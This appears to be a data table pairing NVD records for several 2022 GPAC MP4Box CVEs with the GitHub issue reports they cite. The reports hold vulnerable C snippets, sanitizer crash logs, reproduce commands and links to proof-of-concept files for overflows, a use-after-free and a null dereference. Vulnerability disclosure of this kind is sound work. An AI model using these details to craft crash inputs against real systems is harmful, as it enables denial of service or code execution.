| Another Buffer overflow in gf_vvc_read_pps_bs_internal function of media_tools/av_parsers.c | https://api.github.com/repos/gpac/gpac/issues/2340/comments | 0 | 2022-12-10T10:08:12Z | 2022-12-12T09:59:02Z | https://github.com/gpac/gpac/issues/2340 | 1,488,326,210 | 2,340 | 4,580 |
CVE-2022-47089 | 2023-01-05T15:15:10.707 | GPAC MP4box 2.1-DEV-rev574-g9d5bb184b is vulnerable to Buffer Overflow via gf_vvc_read_sps_bs_internal function of media_tools/av_parsers.c | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/gpac/gpac/issues/2338"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/gpac/gpac/issues/2338"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:gpac:gpac:*:*:*:*:*:*:*:*",
"matchCriteriaId": "B4D3D58A-C3C9-4441-A84A-FB91FD19985C",
"versionEndExcluding": "2.2.0",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"120"
] | 120 | https://github.com/gpac/gpac/issues/2338 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"gpac",
"gpac"
] | Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you!
- [X] I looked for a similar issue and couldn't find any.
- [X] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/
- [X] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95
Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/
# Description
buffer overflow in gf_vvc_read_sps_bs_internal function of media_tools/av_parsers.c
```c
for (i=0; i<sps_rpl1_same_as_rpl0; i++) {
u32 j;
sps->num_ref_pic_lists[i] = gf_bs_read_ue_log_idx(bs, "sps_num_ref_pic_lists", i);
for (j=0; j<sps->num_ref_pic_lists[i]; j++) {
s32 res = vvc_parse_ref_pic_list_struct(bs, sps, i, j, &sps->rps[i][j]); // when j == 64, overflow sps->rps
if (res<0) return res;
}
}
```
# Version info
```
MP4Box - GPAC version 2.1-DEV-rev574-g9d5bb184b-master
(c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io
Please cite our work in your research:
GPAC Filters: https://doi.org/10.1145/3339825.3394929
GPAC: https://doi.org/10.1145/1291233.1291452
GPAC Configuration: --enable-sanitizer
Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_LINUX_DVB GPAC_DISABLE_3D
```
# Reproduce
compile and run
```
./configure --enable-sanitizer
make
./MP4Box import -add poc.mp4
```
Crash reported by sanitizer
```
[VVC] Warning: Error parsing NAL unit
[Core] exp-golomb read failed, not enough bits in bitstream !
media_tools/av_parsers.c:10710:71: runtime error: index 65 out of bounds for type 'VVC_RefPicList [64]'
```
# POC
[poc_bof.zip](https://github.com/gpac/gpac/files/10199702/poc_bof.zip)
# Impact
Potentially causing DoS and RCE
# Credit
xdchase
| Buffer overflow in gf_vvc_read_sps_bs_internal function of media_tools/av_parsers.c | https://api.github.com/repos/gpac/gpac/issues/2338/comments | 0 | 2022-12-10T09:54:16Z | 2022-12-12T09:59:01Z | https://github.com/gpac/gpac/issues/2338 | 1,488,308,020 | 2,338 | 4,581 |
CVE-2022-47091 | 2023-01-05T15:15:10.750 | GPAC MP4box 2.1-DEV-rev574-g9d5bb184b is vulnerable to Buffer Overflow in gf_text_process_sub function of filters/load_text.c | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/gpac/gpac/issues/2343"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://www.debian.org/security/2023/dsa-5411"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/gpac/gpac/issues/2343"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://www.debian.org/security/2023/dsa-5411"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:gpac:gpac:*:*:*:*:*:*:*:*",
"matchCriteriaId": "B4D3D58A-C3C9-4441-A84A-FB91FD19985C",
"versionEndExcluding": "2.2.0",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"120"
] | 120 | https://github.com/gpac/gpac/issues/2343 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"gpac",
"gpac"
] | Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you!
- [X] I looked for a similar issue and couldn't find any.
- [X] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/
- [X] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95
Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/
# Description
Buffer overflow in gf_text_process_sub function of filters/load_text.c
```c
while (szLine[i+1+j] && szLine[i+1+j]!='}') {
szTime[i] = szLine[i+1+j]; // overflow at szTime
i++;
}
```
# Version info
```
MP4Box - GPAC version 2.1-DEV-rev574-g9d5bb184b-master
(c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io
Please cite our work in your research:
GPAC Filters: https://doi.org/10.1145/3339825.3394929
GPAC: https://doi.org/10.1145/1291233.1291452
GPAC Configuration: --enable-sanitizer
Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_LINUX_DVB GPAC_DISABLE_3D
```
# Reproduce
compile and run
```
./configure --enable-sanitizer
make
./MP4Box import -add poc_bof5.avi
```
Crash reported by sanitizer
```
Track Importing Timed Text - Text track 400 x 60 font Serif (size 18) layer 0
[TXTIn] Bad SUB file - expecting "{" got "{"
[TXTIn] corrupted SUB frame (line 2) - ends (at 0 ms) before start of current frame (6 ms) - skipping
filters/load_text.c:2569:10: runtime error: index 20 out of bounds for type 'char [20]'
```
# POC
[poc_bof5.zip](https://github.com/gpac/gpac/files/10202277/poc_bof5.zip)
# Impact
Potentially causing DoS and RCE
# Credit
Xdchase | Buffer overflow in gf_text_process_sub function of filters/load_text.c | https://api.github.com/repos/gpac/gpac/issues/2343/comments | 0 | 2022-12-11T13:21:25Z | 2022-12-12T09:59:02Z | https://github.com/gpac/gpac/issues/2343 | 1,489,970,920 | 2,343 | 4,582 |
CVE-2022-47092 | 2023-01-05T15:15:10.793 | GPAC MP4box 2.1-DEV-rev574-g9d5bb184b is contains an Integer overflow vulnerability in gf_hevc_read_sps_bs_internal function of media_tools/av_parsers.c:8316 | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 5.2,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/gpac/gpac/issues/2347"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/gpac/gpac/issues/2347"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:gpac:gpac:*:*:*:*:*:*:*:*",
"matchCriteriaId": "B4D3D58A-C3C9-4441-A84A-FB91FD19985C",
"versionEndExcluding": "2.2.0",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"190"
] | 190 | https://github.com/gpac/gpac/issues/2347 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"gpac",
"gpac"
] | Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you!
- [X] I looked for a similar issue and couldn't find any.
- [X] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/
- [X] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95
Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/
# Description
Integer overflow in gf_hevc_read_sps_bs_internal function of media_tools/av_parsers.c:8316
```c
sps->max_CU_width = (1 << (sps->log2_min_luma_coding_block_size + sps->log2_diff_max_min_luma_coding_block_size));
sps->max_CU_height = (1 << (sps->log2_min_luma_coding_block_size + sps->log2_diff_max_min_luma_coding_block_size));
```
# Version info
```
MP4Box - GPAC version 2.1-DEV-rev574-g9d5bb184b-master
(c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io
Please cite our work in your research:
GPAC Filters: https://doi.org/10.1145/3339825.3394929
GPAC: https://doi.org/10.1145/1291233.1291452
GPAC Configuration: --enable-sanitizer
Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_LINUX_DVB GPAC_DISABLE_3D
```
# Reproduce
compile and run
```
./configure --enable-sanitizer
make
./MP4Box import -add poc_int.mov
```
Crash reported by sanitizer
```
[Core] exp-golomb read failed, not enough bits in bitstream !
[HEVC] Warning: Error parsing NAL unit
media_tools/av_parsers.c:8316:25: runtime error: shift exponent 146 is too large for 32-bit type 'int'
```
# POC
[poc_int.zip](https://github.com/gpac/gpac/files/10202363/poc_int.zip)
# Impact
Potentially causing DoS and corrupting data structure
# Credit
Xdchase | Integer overflow in gf_hevc_read_sps_bs_internal function of media_tools/av_parsers.c:8316 | https://api.github.com/repos/gpac/gpac/issues/2347/comments | 0 | 2022-12-11T14:02:17Z | 2022-12-12T09:59:04Z | https://github.com/gpac/gpac/issues/2347 | 1,490,026,124 | 2,347 | 4,583 |
CVE-2022-47093 | 2023-01-05T15:15:10.837 | GPAC MP4box 2.1-DEV-rev574-g9d5bb184b is vulnerable to heap use-after-free via filters/dmx_m2ts.c:470 in m2tsdmx_declare_pid | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/gpac/gpac/issues/2344"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/gpac/gpac/issues/2344"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:gpac:gpac:*:*:*:*:*:*:*:*",
"matchCriteriaId": "B4D3D58A-C3C9-4441-A84A-FB91FD19985C",
"versionEndExcluding": "2.2.0",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"416"
] | 416 | https://github.com/gpac/gpac/issues/2344 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"gpac",
"gpac"
] | Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you!
- [X] I looked for a similar issue and couldn't find any.
- [X] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/
- [X] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95
Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/
# Description
heap-use-after-free filters/dmx_m2ts.c:470 in m2tsdmx_declare_pid
# Version info
```
MP4Box - GPAC version 2.1-DEV-rev574-g9d5bb184b-master
(c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io
Please cite our work in your research:
GPAC Filters: https://doi.org/10.1145/3339825.3394929
GPAC: https://doi.org/10.1145/1291233.1291452
GPAC Configuration: --enable-sanitizer
Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_LINUX_DVB GPAC_DISABLE_3D
```
# Reproduce
compile and run
```
./configure --enable-sanitizer
make
./MP4Box import -add poc_uaf.avi
```
# Crash reported by sanitizer
```
Broken PAT found reserved PID 0, ignoring
Broken PAT found reserved PID 0, ignoring
Broken PAT found reserved PID 0, ignoring
Broken PAT found reserved PID 0, ignoring
Broken PAT found reserved PID 0, ignoring
[MPEG-2 TS] PID 1863: Bad Adaptation Descriptor found (tag 100) size is 100 but only 93 bytes available
stream type DSM CC user private sections on pid 32
[MPEG-2 TS] Invalid PMT es descriptor size for PID 32
[MPEG-2 TS] Invalid PMT es descriptor size for PID 5364
Broken PAT found reserved PID 0, ignoring
Broken PAT found reserved PID 0, ignoring
Broken PAT found reserved PID 0, ignoring
Broken PAT found reserved PID 0, ignoring
Broken PAT found reserved PID 0, ignoring
[MPEG-2 TS] PID 1863: Bad Adaptation Descriptor found (tag 100) size is 100 but only 93 bytes available
stream type DSM CC user private sections on pid 32
[MPEG-2 TS] Invalid PMT es descriptor size for PID 32
[MPEG-2 TS] Invalid PMT es descriptor size for PID 5364
=================================================================
==583780==ERROR: AddressSanitizer: heap-use-after-free on address 0x607000004548 at pc 0x7fa6cb05f685 bp 0x7ffc93e21020 sp 0x7ffc93e21010
READ of size 8 at 0x607000004548 thread T0
#0 0x7fa6cb05f684 in m2tsdmx_declare_pid filters/dmx_m2ts.c:470
#1 0x7fa6cb05f98a in m2tsdmx_setup_program filters/dmx_m2ts.c:592
#2 0x7fa6cb06245b in m2tsdmx_on_event filters/dmx_m2ts.c:876
#3 0x7fa6ca9507d4 in gf_m2ts_process_pmt media_tools/mpegts.c:1779
#4 0x7fa6ca9507d4 in gf_m2ts_process_pmt media_tools/mpegts.c:1132
#5 0x7fa6ca9439b6 in gf_m2ts_section_complete media_tools/mpegts.c:624
#6 0x7fa6ca9452af in gf_m2ts_gather_section media_tools/mpegts.c:755
#7 0x7fa6ca94a532 in gf_m2ts_process_packet media_tools/mpegts.c:2721
#8 0x7fa6ca94dd68 in gf_m2ts_process_data media_tools/mpegts.c:2813
#9 0x7fa6cb05a250 in m2tsdmx_process filters/dmx_m2ts.c:1420
#10 0x7fa6caf29bcc in gf_filter_process_task filter_core/filter.c:2750
#11 0x7fa6caee9af3 in gf_fs_thread_proc filter_core/filter_session.c:1859
#12 0x7fa6caef63ee in gf_fs_run filter_core/filter_session.c:2120
#13 0x7fa6ca938fd1 in gf_media_import media_tools/media_import.c:1551
#14 0x55f87208daec in import_file /home/sumuchuan/Desktop/gpac_fuzz/gpac/applications/mp4box/fileimport.c:1498
#15 0x55f8720423db in do_add_cat /home/sumuchuan/Desktop/gpac_fuzz/gpac/applications/mp4box/mp4box.c:4508
#16 0x55f8720423db in mp4box_main /home/sumuchuan/Desktop/gpac_fuzz/gpac/applications/mp4box/mp4box.c:6124
#17 0x7fa6c7ec3d8f in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
#18 0x7fa6c7ec3e3f in __libc_start_main_impl ../csu/libc-start.c:392
#19 0x55f87201ecb4 in _start (/home/sumuchuan/Desktop/gpac_fuzz/gpac/bin/gcc/MP4Box+0xabcb4)
0x607000004548 is located 8 bytes inside of 80-byte region [0x607000004540,0x607000004590)
freed by thread T0 here:
#0 0x7fa6cda1ec18 in __interceptor_realloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:164
#1 0x7fa6ca0aff20 in realloc_chain utils/list.c:621
#2 0x7fa6ca0aff20 in gf_list_add utils/list.c:630
#3 0x7fa6caed06d0 in gf_props_set_property filter_core/filter_props.c:1098
#4 0x7fa6cae8a35d in gf_filter_pid_set_property_full filter_core/filter_pid.c:5411
#5 0x7fa6cae8a35d in gf_filter_pid_set_property filter_core/filter_pid.c:5418
#6 0x7fa6cb05c6b3 in m2tsdmx_declare_pid filters/dmx_m2ts.c:454
#7 0x7fa6cb05f98a in m2tsdmx_setup_program filters/dmx_m2ts.c:592
#8 0x7fa6cb06245b in m2tsdmx_on_event filters/dmx_m2ts.c:876
#9 0x7fa6ca9507d4 in gf_m2ts_process_pmt media_tools/mpegts.c:1779
#10 0x7fa6ca9507d4 in gf_m2ts_process_pmt media_tools/mpegts.c:1132
#11 0x7fa6ca9439b6 in gf_m2ts_section_complete media_tools/mpegts.c:624
#12 0x7fa6ca9452af in gf_m2ts_gather_section media_tools/mpegts.c:755
#13 0x7fa6ca94a532 in gf_m2ts_process_packet media_tools/mpegts.c:2721
#14 0x7fa6ca94dd68 in gf_m2ts_process_data media_tools/mpegts.c:2813
#15 0x7fa6cb05a250 in m2tsdmx_process filters/dmx_m2ts.c:1420
#16 0x7fa6caf29bcc in gf_filter_process_task filter_core/filter.c:2750
#17 0x7fa6caee9af3 in gf_fs_thread_proc filter_core/filter_session.c:1859
#18 0x7fa6caef63ee in gf_fs_run filter_core/filter_session.c:2120
#19 0x7fa6ca938fd1 in gf_media_import media_tools/media_import.c:1551
#20 0x55f87208daec in import_file /home/sumuchuan/Desktop/gpac_fuzz/gpac/applications/mp4box/fileimport.c:1498
#21 0x55f8720423db in do_add_cat /home/sumuchuan/Desktop/gpac_fuzz/gpac/applications/mp4box/mp4box.c:4508
#22 0x55f8720423db in mp4box_main /home/sumuchuan/Desktop/gpac_fuzz/gpac/applications/mp4box/mp4box.c:6124
#23 0x7fa6c7ec3d8f in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
previously allocated by thread T0 here:
#0 0x7fa6cda1ec18 in __interceptor_realloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:164
#1 0x7fa6ca0aff20 in realloc_chain utils/list.c:621
#2 0x7fa6ca0aff20 in gf_list_add utils/list.c:630
#3 0x7fa6caed0d5f in gf_props_merge_property filter_core/filter_props.c:1199
#4 0x7fa6cae9661b in gf_filter_pid_new filter_core/filter_pid.c:5258
#5 0x7fa6cb05adf9 in m2tsdmx_declare_pid filters/dmx_m2ts.c:411
#6 0x7fa6cb05f98a in m2tsdmx_setup_program filters/dmx_m2ts.c:592
#7 0x7fa6cb06245b in m2tsdmx_on_event filters/dmx_m2ts.c:876
#8 0x7fa6ca9507d4 in gf_m2ts_process_pmt media_tools/mpegts.c:1779
#9 0x7fa6ca9507d4 in gf_m2ts_process_pmt media_tools/mpegts.c:1132
#10 0x7fa6ca9439b6 in gf_m2ts_section_complete media_tools/mpegts.c:624
#11 0x7fa6ca9452af in gf_m2ts_gather_section media_tools/mpegts.c:755
#12 0x7fa6ca94a532 in gf_m2ts_process_packet media_tools/mpegts.c:2721
#13 0x7fa6ca94dd68 in gf_m2ts_process_data media_tools/mpegts.c:2813
#14 0x7fa6cb05a250 in m2tsdmx_process filters/dmx_m2ts.c:1420
#15 0x7fa6caf29bcc in gf_filter_process_task filter_core/filter.c:2750
#16 0x7fa6caee9af3 in gf_fs_thread_proc filter_core/filter_session.c:1859
#17 0x7fa6caef63ee in gf_fs_run filter_core/filter_session.c:2120
#18 0x7fa6ca938fd1 in gf_media_import media_tools/media_import.c:1551
#19 0x55f87208daec in import_file /home/sumuchuan/Desktop/gpac_fuzz/gpac/applications/mp4box/fileimport.c:1498
#20 0x55f8720423db in do_add_cat /home/sumuchuan/Desktop/gpac_fuzz/gpac/applications/mp4box/mp4box.c:4508
#21 0x55f8720423db in mp4box_main /home/sumuchuan/Desktop/gpac_fuzz/gpac/applications/mp4box/mp4box.c:6124
#22 0x7fa6c7ec3d8f in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
SUMMARY: AddressSanitizer: heap-use-after-free filters/dmx_m2ts.c:470 in m2tsdmx_declare_pid
Shadow bytes around the buggy address:
0x0c0e7fff8850: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 fa fa
0x0c0e7fff8860: fa fa 00 00 00 00 00 00 00 00 00 00 fa fa fa fa
0x0c0e7fff8870: 00 00 00 00 00 00 00 00 00 00 fa fa fa fa 00 00
0x0c0e7fff8880: 00 00 00 00 00 00 00 00 fa fa fa fa 00 00 00 00
0x0c0e7fff8890: 00 00 00 00 00 00 fa fa fa fa 00 00 00 00 00 00
=>0x0c0e7fff88a0: 00 00 00 00 fa fa fa fa fd[fd]fd fd fd fd fd fd
0x0c0e7fff88b0: fd fd fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c0e7fff88c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c0e7fff88d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c0e7fff88e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c0e7fff88f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==583780==ABORTING
```
# POC
[poc_uaf.zip](https://github.com/gpac/gpac/files/10202295/poc_uaf.zip)
# Impact
Potentially causing DoS and RCE
# Credit
Xdchase | heap-use-after-free filters/dmx_m2ts.c:470 in m2tsdmx_declare_pid | https://api.github.com/repos/gpac/gpac/issues/2344/comments | 0 | 2022-12-11T13:29:49Z | 2022-12-12T09:59:03Z | https://github.com/gpac/gpac/issues/2344 | 1,489,981,443 | 2,344 | 4,584 |
CVE-2022-47094 | 2023-01-05T15:15:10.880 | GPAC MP4box 2.1-DEV-rev574-g9d5bb184b is vulnerable to Null pointer dereference via filters/dmx_m2ts.c:343 in m2tsdmx_declare_pid | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/gpac/gpac/issues/2345"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://www.debian.org/security/2023/dsa-5411"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/gpac/gpac/issues/2345"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://www.debian.org/security/2023/dsa-5411"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:gpac:gpac:*:*:*:*:*:*:*:*",
"matchCriteriaId": "B4D3D58A-C3C9-4441-A84A-FB91FD19985C",
"versionEndExcluding": "2.2.0",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"476"
] | 476 | https://github.com/gpac/gpac/issues/2345 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"gpac",
"gpac"
] | Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you!
- [X] I looked for a similar issue and couldn't find any.
- [X] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/
- [X] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95
Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/
# Description
Null pointer dereference filters/dmx_m2ts.c:343 in m2tsdmx_declare_pid
# Version info
```
MP4Box - GPAC version 2.1-DEV-rev574-g9d5bb184b-master
(c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io
Please cite our work in your research:
GPAC Filters: https://doi.org/10.1145/3339825.3394929
GPAC: https://doi.org/10.1145/1291233.1291452
GPAC Configuration: --enable-sanitizer
Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_LINUX_DVB GPAC_DISABLE_3D
```
# Reproduce
compile and run
```
./configure --enable-sanitizer
make
./MP4Box import -add poc_nderef.avi
```
# Crash reported by sanitizer
```
Broken PAT found reserved PID 0, ignoring
Broken PAT found reserved PID 0, ignoring
Broken PAT found reserved PID 0, ignoring
Broken PAT found reserved PID 0, ignoring
Broken PMT descriptor! size 54, desc size 48 but position 5
MORE sections on pid 4144
Broken PMT descriptor! size 54, desc size 48 but position 10
Broken PMT descriptor! size 54, desc size 48 but position 15
[MPEG-2 TS] PID 4144 reused across programs 8192 and 8192, not completely supported
Broken PMT descriptor! size 54, desc size 48 but position 20
[MPEG-2 TS] PID 4144 reused across programs 8192 and 8192, not completely supported
MORE sections on pid 4144
[MPEG-2 TS] PID 4144 reused across programs 8192 and 8192, not completely supported
[MPEG-2 TS] Invalid PMT es descriptor size for PID 5859
[MPEG-2 TS] TS Packet 3 is scrambled - not supported
Broken PAT found reserved PID 0, ignoring
Broken PAT found reserved PID 0, ignoring
Broken PAT found reserved PID 0, ignoring
Broken PAT found reserved PID 0, ignoring
Broken PMT descriptor! size 54, desc size 48 but position 5
MORE sections on pid 4144
Broken PMT descriptor! size 54, desc size 48 but position 10
Broken PMT descriptor! size 54, desc size 48 but position 15
